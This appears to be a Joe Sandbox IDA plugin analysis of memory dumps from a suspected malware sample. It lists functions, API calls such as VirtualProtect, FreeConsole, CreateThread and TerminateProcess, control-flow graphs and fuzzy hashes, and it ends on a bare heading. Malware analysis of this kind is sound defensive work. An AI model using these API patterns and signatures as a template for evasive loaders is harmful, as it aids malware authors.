• Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
• String ID:
• API String ID: 1378416451-0
• Opcode ID: 7393ef3a266840ecfb28bafa78b5fbde04fc02a3c87046dfa455003385cd42a0
• Instruction ID: d36972b7b1b45452316c96974dc5d16a88178b67316fb41438f00e4ea8c49c43
• Opcode Fuzzy Hash: 7393ef3a266840ecfb28bafa78b5fbde04fc02a3c87046dfa455003385cd42a0
• Instruction Fuzzy Hash: F4719DB4D04648CFDB10EFA8D588B9DBBF0BF48314F508529E499AB345D734A949CF62

Control-flow Graph

APIs
• KiUserExceptionDispatcher.NTDLL ref: 00DB5450
• GetLastError.KERNEL32 ref: 00DB54D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: DispatcherErrorExceptionLastUser
• String ID: [+]
• API String ID: 2542788420-4228040803
• Opcode ID: 0599dd6577e283322f880aa0d72cead4a6067a46b4a9fa9e760488837054fcc7
• Instruction ID: bebea69b8ce9923d095444d6482f92dc2abf4670e02574bd3305f18181162d5c
• Opcode Fuzzy Hash: 0599dd6577e283322f880aa0d72cead4a6067a46b4a9fa9e760488837054fcc7
• Instruction Fuzzy Hash: E87138B494522DCBCB64EF68D8987E9BBF0AF28304F1044E9E88D97351D6749AC4CF61

Control-flow Graph

APIs
• FreeConsole.KERNELBASE ref: 00DB56CA
  • Part of subcall function 00DB52D0: KiUserExceptionDispatcher.NTDLL ref: 00DB5450
  • Part of subcall function 00DB52D0: GetLastError.KERNEL32 ref: 00DB54D6
• VirtualProtect.KERNELBASE ref: 00DB577A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ConsoleDispatcherErrorExceptionFreeLastProtectUserVirtual
• String ID: @
• API String ID: 1907986952-2766056989
• Opcode ID: b56dada036ecd8eac7e2deeb6d6fce723371349a44208d5ca908306eade98b94
• Instruction ID: 8048022a33b03646edbcda1903b209a1eb7bb92fe3edc53de0fadb905393b392
• Opcode Fuzzy Hash: b56dada036ecd8eac7e2deeb6d6fce723371349a44208d5ca908306eade98b94
• Instruction Fuzzy Hash: D741DCB0A01308DFDB04EFA9E4856DEBBF0EF48314F508519E459AB350D775A944CFA1

Control-flow Graph

APIs
• CreateThread.KERNELBASE(?,?,Function_00011249,00000000,?,?), ref: 00D9117A
• GetLastError.KERNEL32(?,00000000,00000000,?,00D887F7), ref: 00D91186
• __dosmaperr.LIBCMT ref: 00D9118D
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744730728-0
                                                                                                                  • Opcode ID: 42ca48ce48cf8fc358458ce669de7b0427ef1685e330a331c21387ec5d5895a9
                                                                                                                  • Instruction ID: 2dda4c0fd573d6f12c3103a36390174e9c7cb8f3f64be188fcffdc7c0e6ce86c
                                                                                                                  • Opcode Fuzzy Hash: 42ca48ce48cf8fc358458ce669de7b0427ef1685e330a331c21387ec5d5895a9
                                                                                                                  • Instruction Fuzzy Hash: 93015E7A60031AFFDF15AFA1DC06AAE3BA9EF00364F104158F901A6250DB71DE50EBB0

Control-flow Graph

control_flow_graph 150 d9ef5f-d9ef81 151 d9f174 150->151 152 d9ef87-d9ef89 150->152 155 d9f176-d9f17a 151->155 153 d9ef8b-d9efaa call d93d59 152->153 154 d9efb5-d9efd8 152->154 163 d9efad-d9efb0 153->163 157 d9efda-d9efdc 154->157 158 d9efde-d9efe4 154->158 157->158 159 d9efe6-d9eff7 157->159 158->153 158->159 161 d9eff9-d9f007 call d9dd0f 159->161 162 d9f00a-d9f01a call d9f28c 159->162 161->162 168 d9f01c-d9f022 162->168 169 d9f063-d9f075 162->169 163->155 172 d9f04b-d9f061 call d9f309 168->172 173 d9f024-d9f027 168->173 170 d9f0cc-d9f0ec WriteFile 169->170 171 d9f077-d9f07d 169->171 178 d9f0ee-d9f0f4 GetLastError 170->178 179 d9f0f7 170->179 174 d9f0b8-d9f0c5 call d9f738 171->174 175 d9f07f-d9f082 171->175 188 d9f044-d9f046 172->188 176 d9f029-d9f02c 173->176 177 d9f032-d9f041 call d9f6d0 173->177 195 d9f0ca 174->195 183 d9f0a4-d9f0b6 call d9f8fc 175->183 184 d9f084-d9f087 175->184 176->177 185 d9f10c-d9f10f 176->185 177->188 178->179 182 d9f0fa-d9f105 179->182 189 d9f16f-d9f172 182->189 190 d9f107-d9f10a 182->190 200 d9f09f-d9f0a2 183->200 191 d9f112-d9f114 184->191 192 d9f08d-d9f09a call d9f813 184->192 185->191 188->182 189->155 190->185 196 d9f142-d9f14e 191->196 197 d9f116-d9f11b 191->197 192->200 195->200 203 d9f158-d9f16a 196->203 204 d9f150-d9f156 196->204 201 d9f11d-d9f12f 197->201 202 d9f134-d9f13d call d93551 197->202 200->188 201->163 202->163 203->163 204->151 204->203
APIs
  • Part of subcall function 00D9F309: GetConsoleOutputCP.KERNEL32(6FF93721,00000000,00000000,?), ref: 00D9F36C
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9434B,?), ref: 00D9F0E4
• GetLastError.KERNEL32(?,?,00D9434B,?,00D9458F,00000000,?,00000000,00D9458F,?,?,?,00DB16F0,0000002C,00D9447B,?), ref: 00D9F0EE
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• API String ID: 2915228174-0
• Opcode ID: 2839346c8533af153f96f6b0e8153a4638127b7b16bf3b111813d53bcdbee086
• Instruction ID: cc7385be9fe45468e3fe1b4d59745d6cd4e1c6f09eb28ae64fc0bba935c090d3
• Opcode Fuzzy Hash: 2839346c8533af153f96f6b0e8153a4638127b7b16bf3b111813d53bcdbee086
• Instruction Fuzzy Hash: 4C618E71904219EFDF11DFA8C884AAEBBBAAF49304F190165E904E7252D376DA11DBB0

Control-flow Graph

control_flow_graph 207 d9f738-d9f78d call d8c0a0 210 d9f78f 207->210 211 d9f802-d9f812 call d88eaa 207->211 212 d9f795 210->212 215 d9f79b-d9f79d 212->215 216 d9f79f-d9f7a4 215->216 217 d9f7b7-d9f7dc WriteFile 215->217 218 d9f7ad-d9f7b5 216->218 219 d9f7a6-d9f7ac 216->219 220 d9f7fa-d9f800 GetLastError 217->220 221 d9f7de-d9f7e9 217->221 218->215 218->217 219->218 220->211 221->211 222 d9f7eb-d9f7f6 221->222 222->212 223 d9f7f8 222->223 223->211
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D9F0CA,00000000,00D9458F,?,00000000,?,00000000), ref: 00D9F7D4
• GetLastError.KERNEL32(?,00D9F0CA,00000000,00D9458F,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9434B), ref: 00D9F7FA
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 89b71b53d406de64f16557647a705ae995ffd51a6ec38863e9a07ada5d824df9
• Instruction ID: 6f3923f3571506b8e7de811ff7ec028ce3171d879315968739bc85e5a0191b36
• Opcode Fuzzy Hash: 89b71b53d406de64f16557647a705ae995ffd51a6ec38863e9a07ada5d824df9
• Instruction Fuzzy Hash: D2218B75A00219DBCF19CF69DC809E9B7F9EF48305F2441AAE946D7211D730DE828B70

Control-flow Graph

control_flow_graph 224 d98e82-d98e87 225 d98e89-d98ea1 224->225 226 d98eaf-d98eb8 225->226 227 d98ea3-d98ea7 225->227 228 d98eca 226->228 229 d98eba-d98ebd 226->229 227->226 230 d98ea9-d98ead 227->230 233 d98ecc-d98ed9 GetStdHandle 228->233 231 d98ebf-d98ec4 229->231 232 d98ec6-d98ec8 229->232 234 d98f24-d98f28 230->234 231->233 232->233 235 d98edb-d98edd 233->235 236 d98f06-d98f18 233->236 234->225 237 d98f2e-d98f31 234->237 235->236 238 d98edf-d98ee8 GetFileType 235->238 236->234 239 d98f1a-d98f1d 236->239 238->236 240 d98eea-d98ef3 238->240 239->234 241 d98efb-d98efe 240->241 242 d98ef5-d98ef9 240->242 241->234 243 d98f00-d98f04 241->243 242->234 243->234
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00D98D71,00DB1A10), ref: 00D98ECE
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00D98D71,00DB1A10), ref: 00D98EE0
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 2ebe3586f262f26ae613f3413dd2a8be77239087630994fcb4ef8dc7f436e47b
• Instruction ID: cd308b28f9c9a9401e4698144ff615f79513c2320269e2c6be854ee124ce8da9
• Opcode Fuzzy Hash: 2ebe3586f262f26ae613f3413dd2a8be77239087630994fcb4ef8dc7f436e47b
• Instruction Fuzzy Hash: 9F11B4716047418ACF308E3E8C98622BA959B67B30B3C1719E4B6D65F1CB35D986F264

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32 ref: 00DB5B38
• GetModuleFileNameA.KERNEL32 ref: 00DB5B58
  • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
  • Part of subcall function 00D81690: GetCurrentThreadId.KERNEL32 ref: 00D816CB
  • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
  • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
Memory Dump Source
• Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$Module$CurrentFileHandleNameThread
• String ID:
• API String ID: 1246727395-0
• Opcode ID: 0540fef431cea80bb5f1a6adb6c11ffce954689449985e80f7d4425653697561
• Instruction ID: a9aa587a3b388f3aec24e1413883b663a6dcb34c7592702f41cf903c90d9569f
• Opcode Fuzzy Hash: 0540fef431cea80bb5f1a6adb6c11ffce954689449985e80f7d4425653697561
• Instruction Fuzzy Hash: B211C9B4904218CFCB54FF68D9467DDBBF4EB48700F4049A9E48997350EA745A848FA1

Control-flow Graph

APIs
• GetLastError.KERNEL32(00DB1540,0000000C), ref: 00D9125C
• ExitThread.KERNEL32 ref: 00D91263
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
• Opcode ID: 5aa0239b223a9ea5534d019e0e1bfec8a5ee9051eefb936836e1500588a58097
• Instruction ID: 80451469aa6680f75569a798636df0a558bb784be94db7261cad372599d85319
• Opcode Fuzzy Hash: 5aa0239b223a9ea5534d019e0e1bfec8a5ee9051eefb936836e1500588a58097
• Instruction Fuzzy Hash: 3DF08C75A40205EFDF01BB70C84AA6E3B75EF41710F144649F4029B291DB3059018BB1

Control-flow Graph

• control_flow_graph 279 db5600-db564d GetCurrentProcess TerminateProcess call d88eaa 282 db5652-db5657 279->282
APIs
• GetCurrentProcess.KERNEL32 ref: 00DB562C
• TerminateProcess.KERNELBASE ref: 00DB563F
Memory Dump Source
• Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID:
• API String ID: 2429186680-0

Control-flow Graph

• control_flow_graph 283 d975d3-d975e7 GetLastError 284 d975e9-d975f1 call d97feb 283->284 285 d97603-d9760d call d9802a 283->285 290 d975fe 284->290 291 d975f3-d975fc 284->291 292 d9760f-d97611 285->292 293 d97613-d9761b call d98700 285->293 290->285 295 d97678-d97681 SetLastError 291->295 292->295 296 d97620-d97626 293->296 297 d97688-d9768d call d9411a 295->297 298 d97683-d97687 295->298 299 d97639-d97647 call d9802a 296->299 300 d97628-d97637 call d9802a 296->300 308 d97649-d97657 call d9802a 299->308 309 d97660-d97675 call d978e4 call d97347 299->309 307 d97658-d9765e call d97347 300->307 317 d97677 307->317 308->307 309->317 317->295
APIs
• GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
• SetLastError.KERNEL32(00000000), ref: 00D97679
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0

Control-flow Graph

• control_flow_graph 319 d8a10f-d8a129 320 d8a12b-d8a12d 319->320 321 d8a132-d8a13a 319->321 322 d8a20b-d8a218 call d88eaa 320->322 323 d8a15b-d8a15f 321->323 324 d8a13c-d8a146 321->324 326 d8a165-d8a176 call d8a99f 323->326 327 d8a207 323->327 324->323 332 d8a148-d8a159 324->332 335 d8a178-d8a17c 326->335 336 d8a17e-d8a1b2 326->336 331 d8a20a 327->331 331->322 334 d8a1d4-d8a1d6 332->334 334->331 337 d8a1c5 call d89ac0 335->337 342 d8a1d8-d8a1e0 336->342 343 d8a1b4-d8a1b7 336->343 340 d8a1ca-d8a1d1 337->340 340->334 344 d8a1e2-d8a1f3 call d94dca 342->344 345 d8a1f5-d8a205 342->345 343->342 346 d8a1b9-d8a1bd 343->346 344->327 344->345 345->331 346->327 348 d8a1bf-d8a1c2 346->348 348->337
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00D88825
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0

APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00D88C0B
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0

Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0

APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00D97620,00000001,00000364,?,00000006,000000FF,?,00D9126E,00DB1540,0000000C), ref: 00D98741
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

APIs
• RtlAllocateHeap.NTDLL(00000000,00D9935A,?,?,00D9935A,00000220,?,00000000,?), ref: 00D973B3
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 025fa3cb04db64d362809c1bf5ccbbe7b44de9d3ae6503f9cabd1fc7c44f6528
                                                                                                                  • Instruction ID: 7dd6403c586f2fc8f3b25510c75fabe3882c63bc11e43f4323f171a8ab1c1606
                                                                                                                  • Opcode Fuzzy Hash: 025fa3cb04db64d362809c1bf5ccbbe7b44de9d3ae6503f9cabd1fc7c44f6528
                                                                                                                  • Instruction Fuzzy Hash: E2E0923292A222E6EF213A659C02F6B3B4CDF417F0F1D0121FC68D6195DB20CC00A5B5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __floor_pentium4
                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                  • Opcode ID: 61b5c95b5099b76a587ce3954f3b95dec5b3f83c321fbcfa646464237ed45d1b
                                                                                                                  • Instruction ID: 3956e62fd01e3c065a863859bbc2cff9c57e0acf68b716d119bab4554b82d379
                                                                                                                  • Opcode Fuzzy Hash: 61b5c95b5099b76a587ce3954f3b95dec5b3f83c321fbcfa646464237ed45d1b
                                                                                                                  • Instruction Fuzzy Hash: F2D23A71E082288FDB65CE28CD407EAB7B6EB45314F1845EAE44DE7240D778AF858F61
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE38
                                                                                                                  • GetACP.KERNEL32(?,?,00D9C747,?,00000000), ref: 00D9CE4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction ID: 0fc6945f2c79d253734742c2b525c288fcfdee3babc7e08326dc03ef9e894f08
                                                                                                                  • Opcode Fuzzy Hash: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction Fuzzy Hash: 3221A122A60201EAEF359F64C900B9777A6EB54B64B5AA574F90BD7204F732DE41C3B0
                                                                                                                  APIs
